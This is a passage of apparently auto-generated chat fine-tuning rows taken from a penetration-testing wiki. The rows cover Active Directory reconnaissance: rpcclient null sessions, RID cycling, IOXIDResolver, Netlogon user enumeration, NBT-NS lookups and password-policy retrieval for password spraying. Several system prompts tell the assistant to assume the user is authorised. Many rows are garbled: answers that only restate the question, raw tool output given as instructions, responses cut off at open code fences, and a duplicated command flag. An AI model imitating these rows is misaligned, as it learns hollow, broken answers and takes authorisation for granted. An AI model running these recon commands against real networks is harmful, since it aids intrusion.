obtain info on a user, equivalent to net user /domain\n* querygroupmem : obtain group members, equivalent to net group /domain\n* getdompwinfo: get password policy\n\n``bash\nrpcclient -c \"command\" -U \"\" -N \"$TARGET\"\n``", "metadata": {"corpus_index": 1292, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on MS-RPC - Recon through interesting named pipes"}, {"role": "assistant", "content": "The Samba utility named rpcclient can be used to operate recon through MS-RPC services behind SMB named pipes. It offers multiple useful commands.\n\n* lsaquery: get domain name and SID (Security IDentifier)\n* enumalsgroups builtin: list local groups, returns RIDs (Relative IDs)\n* queryaliasmem : list local group members, returns SIDs\n* lookupsids : resolve SID to name\n* lookupnames : resolve name to SID\n* enumdomusers: list users, equivalent to net user /domain\n* enumdomgroups: list groups equivalent to net group /domain\n* queryuser : obtain info on a user, equivalent to net user /domain\n* querygroupmem : obtain group members, equivalent to net group /domain\n* getdompwinfo: get password policy\n\n``bash\nrpcclient -c \"command\" -U \"\" -N \"$TARGET\"\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on MS-RPC - Recon through interesting named pipes", "response": "The Samba utility named rpcclient can be used to operate recon through MS-RPC services behind SMB named pipes. It offers multiple useful commands.\n\n* lsaquery: get domain name and SID (Security IDentifier)\n* enumalsgroups builtin: list local groups, returns RIDs (Relative IDs)\n* queryaliasmem : list local group members, returns SIDs\n* lookupsids : resolve SID to name\n* lookupnames : resolve name to SID\n* enumdomusers: list users, equivalent to net user /domain\n* enumdomgroups: list groups equivalent to net group /domain\n* queryuser : obtain info on a user, equivalent to net user /domain\n* querygroupmem : obtain group members, equivalent to net group /domain\n* getdompwinfo: get password policy\n\n``bash\nrpcclient -c \"command\" -U \"\" -N \"$TARGET\"\n``", "metadata": {"corpus_index": 1292, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the rpcclient command for ms-rpc - recon through interesting named pipes"}, {"role": "assistant", "content": "rpcclient -c \"command\" -U \"\" -N \"$TARGET\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the rpcclient command for ms-rpc - recon through interesting named pipes", "response": "rpcclient -c \"command\" -U \"\" -N \"$TARGET\"", "metadata": {"corpus_index": 1293, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "rpcclient"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out MS-RPC - Recon through interesting named pipes during a pentest?"}, {"role": "assistant", "content": "rpcclient -c \"command\" -U \"\" -N \"$TARGET\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out MS-RPC - Recon through interesting named pipes during a pentest?", "response": "rpcclient -c \"command\" -U \"\" -N \"$TARGET\"", "metadata": {"corpus_index": 1293, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `rpcclient -c \"command\" -U \"\" -N \"$TARGET\"`?"}, {"role": "assistant", "content": "This command is used for ms-rpc - recon through interesting named pipes. Recon through interesting named pipes"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `rpcclient -c \"command\" -U \"\" -N \"$TARGET\"`?", "response": "This command is used for ms-rpc - recon through interesting named pipes. Recon through interesting named pipes", "metadata": {"corpus_index": 1293, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about MS-RPC - RID Cycling?"}, {"role": "assistant", "content": "RID Cycling is a method that allows attackers to enumerate domain objects by bruteforcing or guessing RIDs and SIDs, based on the fact that RIDs are sequential.\n\nThe Python script ridenum can be used to operate that recon technique, with a Null session or with an authenticated one.\n\n> [!SUCCESS]\n> The enum4linux tool can be used to easily operate fast recon through MS-RPC, with Null session or not (see this page)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about MS-RPC - RID Cycling?", "response": "RID Cycling is a method that allows attackers to enumerate domain objects by bruteforcing or guessing RIDs and SIDs, based on the fact that RIDs are sequential.\n\nThe Python script ridenum can be used to operate that recon technique, with a Null session or with an authenticated one.\n\n> [!SUCCESS]\n> The enum4linux tool can be used to easily operate fast recon through MS-RPC, with Null session or not (see this page).", "metadata": {"corpus_index": 1294, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for MS-RPC - RID Cycling"}, {"role": "assistant", "content": "RID Cycling is a method that allows attackers to enumerate domain objects by bruteforcing or guessing RIDs and SIDs, based on the fact that RIDs are sequential.\n\nThe Python script ridenum can be used to operate that recon technique, with a Null session or with an authenticated one.\n\n> [!SUCCESS]\n> The enum4linux tool can be used to easily operate fast recon through MS-RPC, with Null session or not (see this page)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for MS-RPC - RID Cycling", "response": "RID Cycling is a method that allows attackers to enumerate domain objects by bruteforcing or guessing RIDs and SIDs, based on the fact that RIDs are sequential.\n\nThe Python script ridenum can be used to operate that recon technique, with a Null session or with an authenticated one.\n\n> [!SUCCESS]\n> The enum4linux tool can be used to easily operate fast recon through MS-RPC, with Null session or not (see this page).", "metadata": {"corpus_index": 1294, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does MS-RPC - IObjectExporter(IOXIDResolver) work?"}, {"role": "assistant", "content": "DCOM (Distributed Component Object Model) is a group of Microsoft programs in which client program objects can request services on other computers on a network. DCOM is based on the Component Object Model (COM), which provides a set of interfaces for clients and servers to communicate within the same network.\n\nAmong these services is IObjectExporter(OXIDResolver GUID=99fcfec4–5260–101b-bbcb-00aa0021347a), which runs on all machines that can support COM+. The DCE-RPC requests allows to invoke the OXIDResolver service and subsequently from this service we can invoke the ServerAlive2() methods. The ServerAlive2 method retrieves information about network interfaces available on a remote machine in a DCOM/COM environment. Specifically, it provides a list of links (bindings) associated with the network interfaces active on the target machine.\n\nTo sum up, if the IOXIDResolver service is active and accessible on a windows host, it is possible to find new network endpoints(like IPv6 address) on this last one (via anonymous connection or with credentials). A python script exists to do this task remotly IOXIDResolver-ng.\n```bash\npython IOXIDResolver-ng.py -t \"$TARGET\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does MS-RPC - IObjectExporter(IOXIDResolver) work?", "response": "DCOM (Distributed Component Object Model) is a group of Microsoft programs in which client program objects can request services on other computers on a network. DCOM is based on the Component Object Model (COM), which provides a set of interfaces for clients and servers to communicate within the same network.\n\nAmong these services is IObjectExporter(OXIDResolver GUID=99fcfec4–5260–101b-bbcb-00aa0021347a), which runs on all machines that can support COM+. The DCE-RPC requests allows to invoke the OXIDResolver service and subsequently from this service we can invoke the ServerAlive2() methods. The ServerAlive2 method retrieves information about network interfaces available on a remote machine in a DCOM/COM environment. Specifically, it provides a list of links (bindings) associated with the network interfaces active on the target machine.\n\nTo sum up, if the IOXIDResolver service is active and accessible on a windows host, it is possible to find new network endpoints(like IPv6 address) on this last one (via anonymous connection or with credentials). A python script exists to do this task remotly IOXIDResolver-ng.\n```bash\npython IOXIDResolver-ng.py -t \"$TARGET\"", "metadata": {"corpus_index": 1295, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out MS-RPC - IObjectExporter(IOXIDResolver) during a pentest?"}, {"role": "assistant", "content": "DCOM (Distributed Component Object Model) is a group of Microsoft programs in which client program objects can request services on other computers on a network. DCOM is based on the Component Object Model (COM), which provides a set of interfaces for clients and servers to communicate within the same network.\n\nAmong these services is IObjectExporter(OXIDResolver GUID=99fcfec4–5260–101b-bbcb-00aa0021347a), which runs on all machines that can support COM+. The DCE-RPC requests allows to invoke the OXIDResolver service and subsequently from this service we can invoke the ServerAlive2() methods. The ServerAlive2 method retrieves information about network interfaces available on a remote machine in a DCOM/COM environment. Specifically, it provides a list of links (bindings) associated with the network interfaces active on the target machine.\n\nTo sum up, if the IOXIDResolver service is active and accessible on a windows host, it is possible to find new network endpoints(like IPv6 address) on this last one (via anonymous connection or with credentials). A python script exists to do this task remotly IOXIDResolver-ng.\n```bash\npython IOXIDResolver-ng.py -t \"$TARGET\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out MS-RPC - IObjectExporter(IOXIDResolver) during a pentest?", "response": "DCOM (Distributed Component Object Model) is a group of Microsoft programs in which client program objects can request services on other computers on a network. DCOM is based on the Component Object Model (COM), which provides a set of interfaces for clients and servers to communicate within the same network.\n\nAmong these services is IObjectExporter(OXIDResolver GUID=99fcfec4–5260–101b-bbcb-00aa0021347a), which runs on all machines that can support COM+. The DCE-RPC requests allows to invoke the OXIDResolver service and subsequently from this service we can invoke the ServerAlive2() methods. The ServerAlive2 method retrieves information about network interfaces available on a remote machine in a DCOM/COM environment. Specifically, it provides a list of links (bindings) associated with the network interfaces active on the target machine.\n\nTo sum up, if the IOXIDResolver service is active and accessible on a windows host, it is possible to find new network endpoints(like IPv6 address) on this last one (via anonymous connection or with credentials). A python script exists to do this task remotly IOXIDResolver-ng.\n```bash\npython IOXIDResolver-ng.py -t \"$TARGET\"", "metadata": {"corpus_index": 1295, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe OUTPUT EXEMPLE in the context of penetration testing"}, {"role": "assistant", "content": "[*] Anonymous connection on MSRPC\n[+] Retriev Network Interfaces for 192.168.5.20...\n[+] ServerAlive2 methode find 3 interface(s)\n[+] aNetworkAddr addresse : DC01 (Hostname)\n[+] aNetworkAddr addresse : 192.168.5.20 (IPv4)\n[+] aNetworkAddr addresse : db69:ecdc:d85:1b54:1676:7fa4:f3fe:4249 (IPv6)\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe OUTPUT EXEMPLE in the context of penetration testing", "response": "[*] Anonymous connection on MSRPC\n[+] Retriev Network Interfaces for 192.168.5.20...\n[+] ServerAlive2 methode find 3 interface(s)\n[+] aNetworkAddr addresse : DC01 (Hostname)\n[+] aNetworkAddr addresse : 192.168.5.20 (IPv4)\n[+] aNetworkAddr addresse : db69:ecdc:d85:1b54:1676:7fa4:f3fe:4249 (IPv6)\n```", "metadata": {"corpus_index": 1296, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out OUTPUT EXEMPLE during a pentest?"}, {"role": "assistant", "content": "[*] Anonymous connection on MSRPC\n[+] Retriev Network Interfaces for 192.168.5.20...\n[+] ServerAlive2 methode find 3 interface(s)\n[+] aNetworkAddr addresse : DC01 (Hostname)\n[+] aNetworkAddr addresse : 192.168.5.20 (IPv4)\n[+] aNetworkAddr addresse : db69:ecdc:d85:1b54:1676:7fa4:f3fe:4249 (IPv6)\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out OUTPUT EXEMPLE during a pentest?", "response": "[*] Anonymous connection on MSRPC\n[+] Retriev Network Interfaces for 192.168.5.20...\n[+] ServerAlive2 methode find 3 interface(s)\n[+] aNetworkAddr addresse : DC01 (Hostname)\n[+] aNetworkAddr addresse : 192.168.5.20 (IPv4)\n[+] aNetworkAddr addresse : db69:ecdc:d85:1b54:1676:7fa4:f3fe:4249 (IPv6)\n```", "metadata": {"corpus_index": 1296, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about MS-RPC - Enumerate Domain users and computers"}, {"role": "assistant", "content": "Using auth-level = 1 (No authentication) against the MS-NRPC (Netlogon) interface on domain controllers.\nThe method calls the DsrGetDcNameEx2 function after binding MS-NRPC interface to check if the user or computer exists without any credentials. \nThe NauthNRPC tool implements this type of enumeration\n``bash \npython3 nauth.py -t \"$TARGET\" -u users_file.txt -f computers_file.txt\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about MS-RPC - Enumerate Domain users and computers", "response": "Using auth-level = 1 (No authentication) against the MS-NRPC (Netlogon) interface on domain controllers.\nThe method calls the DsrGetDcNameEx2 function after binding MS-NRPC interface to check if the user or computer exists without any credentials. \nThe NauthNRPC tool implements this type of enumeration\n``bash \npython3 nauth.py -t \"$TARGET\" -u users_file.txt -f computers_file.txt\n``", "metadata": {"corpus_index": 1297, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for MS-RPC - Enumerate Domain users and computers?"}, {"role": "assistant", "content": "Using auth-level = 1 (No authentication) against the MS-NRPC (Netlogon) interface on domain controllers.\nThe method calls the DsrGetDcNameEx2 function after binding MS-NRPC interface to check if the user or computer exists without any credentials. \nThe NauthNRPC tool implements this type of enumeration\n``bash \npython3 nauth.py -t \"$TARGET\" -u users_file.txt -f computers_file.txt\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for MS-RPC - Enumerate Domain users and computers?", "response": "Using auth-level = 1 (No authentication) against the MS-NRPC (Netlogon) interface on domain controllers.\nThe method calls the DsrGetDcNameEx2 function after binding MS-NRPC interface to check if the user or computer exists without any credentials. \nThe NauthNRPC tool implements this type of enumeration\n``bash \npython3 nauth.py -t \"$TARGET\" -u users_file.txt -f computers_file.txt\n``", "metadata": {"corpus_index": 1297, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the python3 syntax for ms-rpc - enumerate domain users and computers?"}, {"role": "assistant", "content": "python3 nauth.py -t \"$TARGET\" -u users_file.txt -f computers_file.txt"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the python3 syntax for ms-rpc - enumerate domain users and computers?", "response": "python3 nauth.py -t \"$TARGET\" -u users_file.txt -f computers_file.txt", "metadata": {"corpus_index": 1298, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "python3"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for MS-RPC - Enumerate Domain users and computers?"}, {"role": "assistant", "content": "python3 nauth.py -t \"$TARGET\" -u users_file.txt -f computers_file.txt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for MS-RPC - Enumerate Domain users and computers?", "response": "python3 nauth.py -t \"$TARGET\" -u users_file.txt -f computers_file.txt", "metadata": {"corpus_index": 1298, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `python3 nauth.py -t \"$TARGET\" -u users_file.txt -f computers_file.txt`?"}, {"role": "assistant", "content": "This command is used for ms-rpc - enumerate domain users and computers. Enumerate Domain users and computers"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `python3 nauth.py -t \"$TARGET\" -u users_file.txt -f computers_file.txt`?", "response": "This command is used for ms-rpc - enumerate domain users and computers. Enumerate Domain users and computers", "metadata": {"corpus_index": 1298, "category": "network", "source_file": "docs/src/ad/recon/ms-rpc.md", "page_title": "MS-RPC", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain NBT-NS"}, {"role": "assistant", "content": "Just like DNS, the NTB-NS (NetBIOS name service) protocol is used to translate names to IP addresses. By default, it's used as a fallback in AD-DS.\n\nThe tools nbtscan and nmblookup can be used for reverse lookup (IP addresses to NetBIOS names)\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain NBT-NS", "response": "Just like DNS, the NTB-NS (NetBIOS name service) protocol is used to translate names to IP addresses. By default, it's used as a fallback in AD-DS.\n\nThe tools nbtscan and nmblookup can be used for reverse lookup (IP addresses to NetBIOS names)\n\n```bash", "metadata": {"corpus_index": 1299, "category": "linux", "source_file": "docs/src/ad/recon/nbt-ns.md", "page_title": "NBT-NS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out NBT-NS during a pentest?"}, {"role": "assistant", "content": "Just like DNS, the NTB-NS (NetBIOS name service) protocol is used to translate names to IP addresses. By default, it's used as a fallback in AD-DS.\n\nThe tools nbtscan and nmblookup can be used for reverse lookup (IP addresses to NetBIOS names)\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out NBT-NS during a pentest?", "response": "Just like DNS, the NTB-NS (NetBIOS name service) protocol is used to translate names to IP addresses. By default, it's used as a fallback in AD-DS.\n\nThe tools nbtscan and nmblookup can be used for reverse lookup (IP addresses to NetBIOS names)\n\n```bash", "metadata": {"corpus_index": 1299, "category": "linux", "source_file": "docs/src/ad/recon/nbt-ns.md", "page_title": "NBT-NS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Find names and workgroup from an IP address"}, {"role": "assistant", "content": "nmblookup -A \"$TARGET\"\n```\n\n> [!SUCCESS]\n> Some NBT-NS recon can be carried out with the enum4linux tool (see this page).\n\nhttps://wiki.wireshark.org/NetBIOS/NBNS"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Find names and workgroup from an IP address", "response": "nmblookup -A \"$TARGET\"\n```\n\n> [!SUCCESS]\n> Some NBT-NS recon can be carried out with the enum4linux tool (see this page).\n\nhttps://wiki.wireshark.org/NetBIOS/NBNS", "metadata": {"corpus_index": 1300, "category": "linux", "source_file": "docs/src/ad/recon/nbt-ns.md", "page_title": "NBT-NS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Find names and workgroup from an IP address?"}, {"role": "assistant", "content": "nmblookup -A \"$TARGET\"\n```\n\n> [!SUCCESS]\n> Some NBT-NS recon can be carried out with the enum4linux tool (see this page).\n\nhttps://wiki.wireshark.org/NetBIOS/NBNS"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Find names and workgroup from an IP address?", "response": "nmblookup -A \"$TARGET\"\n```\n\n> [!SUCCESS]\n> Some NBT-NS recon can be carried out with the enum4linux tool (see this page).\n\nhttps://wiki.wireshark.org/NetBIOS/NBNS", "metadata": {"corpus_index": 1300, "category": "linux", "source_file": "docs/src/ad/recon/nbt-ns.md", "page_title": "NBT-NS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Password policy?"}, {"role": "assistant", "content": "When attacking Active Directory domains, directly targeting accounts is usually a great start. It could provide initial access and help the attackers operate lateral movement. The easiest way to compromise accounts is to operate some password guessing or spraying. This kind of attack usually yields good results depending on the user's awareness. There are however technical measures that usually are in place, forcing the attackers to balance the number and speed of password attempts.\n\nIn order to fine-tune this, the password policy can be obtained. This policy can sometimes be enumerated with a null-session (i.e. an MS-RPC null session or an LDAP anonymous bind).\n\n::: tabs\n\n=== UNIX-like\n\nOn UNIX-like systems, there are many alternatives that allow obtaining the password policy like polenum (Python), NetExec (Python), ldapsearch-ad (Python) and enum4linux.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Password policy?", "response": "When attacking Active Directory domains, directly targeting accounts is usually a great start. It could provide initial access and help the attackers operate lateral movement. The easiest way to compromise accounts is to operate some password guessing or spraying. This kind of attack usually yields good results depending on the user's awareness. There are however technical measures that usually are in place, forcing the attackers to balance the number and speed of password attempts.\n\nIn order to fine-tune this, the password policy can be obtained. This policy can sometimes be enumerated with a null-session (i.e. an MS-RPC null session or an LDAP anonymous bind).\n\n::: tabs\n\n=== UNIX-like\n\nOn UNIX-like systems, there are many alternatives that allow obtaining the password policy like polenum (Python), NetExec (Python), ldapsearch-ad (Python) and enum4linux.\n\n```bash", "metadata": {"corpus_index": 1301, "category": "credentials", "source_file": "docs/src/ad/recon/password-policy.md", "page_title": "Password policy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Password policy?"}, {"role": "assistant", "content": "When attacking Active Directory domains, directly targeting accounts is usually a great start. It could provide initial access and help the attackers operate lateral movement. The easiest way to compromise accounts is to operate some password guessing or spraying. This kind of attack usually yields good results depending on the user's awareness. There are however technical measures that usually are in place, forcing the attackers to balance the number and speed of password attempts.\n\nIn order to fine-tune this, the password policy can be obtained. This policy can sometimes be enumerated with a null-session (i.e. an MS-RPC null session or an LDAP anonymous bind).\n\n::: tabs\n\n=== UNIX-like\n\nOn UNIX-like systems, there are many alternatives that allow obtaining the password policy like polenum (Python), NetExec (Python), ldapsearch-ad (Python) and enum4linux.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Password policy?", "response": "When attacking Active Directory domains, directly targeting accounts is usually a great start. It could provide initial access and help the attackers operate lateral movement. The easiest way to compromise accounts is to operate some password guessing or spraying. This kind of attack usually yields good results depending on the user's awareness. There are however technical measures that usually are in place, forcing the attackers to balance the number and speed of password attempts.\n\nIn order to fine-tune this, the password policy can be obtained. This policy can sometimes be enumerated with a null-session (i.e. an MS-RPC null session or an LDAP anonymous bind).\n\n::: tabs\n\n=== UNIX-like\n\nOn UNIX-like systems, there are many alternatives that allow obtaining the password policy like polenum (Python), NetExec (Python), ldapsearch-ad (Python) and enum4linux.\n\n```bash", "metadata": {"corpus_index": 1301, "category": "credentials", "source_file": "docs/src/ad/recon/password-policy.md", "page_title": "Password policy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of polenum (obtained through MS-RPC)"}, {"role": "assistant", "content": "polenum -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of polenum (obtained through MS-RPC)", "response": "polenum -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\"", "metadata": {"corpus_index": 1302, "category": "credentials", "source_file": "docs/src/ad/recon/password-policy.md", "page_title": "Password policy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through polenum (obtained through MS-RPC)"}, {"role": "assistant", "content": "polenum -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through polenum (obtained through MS-RPC)", "response": "polenum -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\"", "metadata": 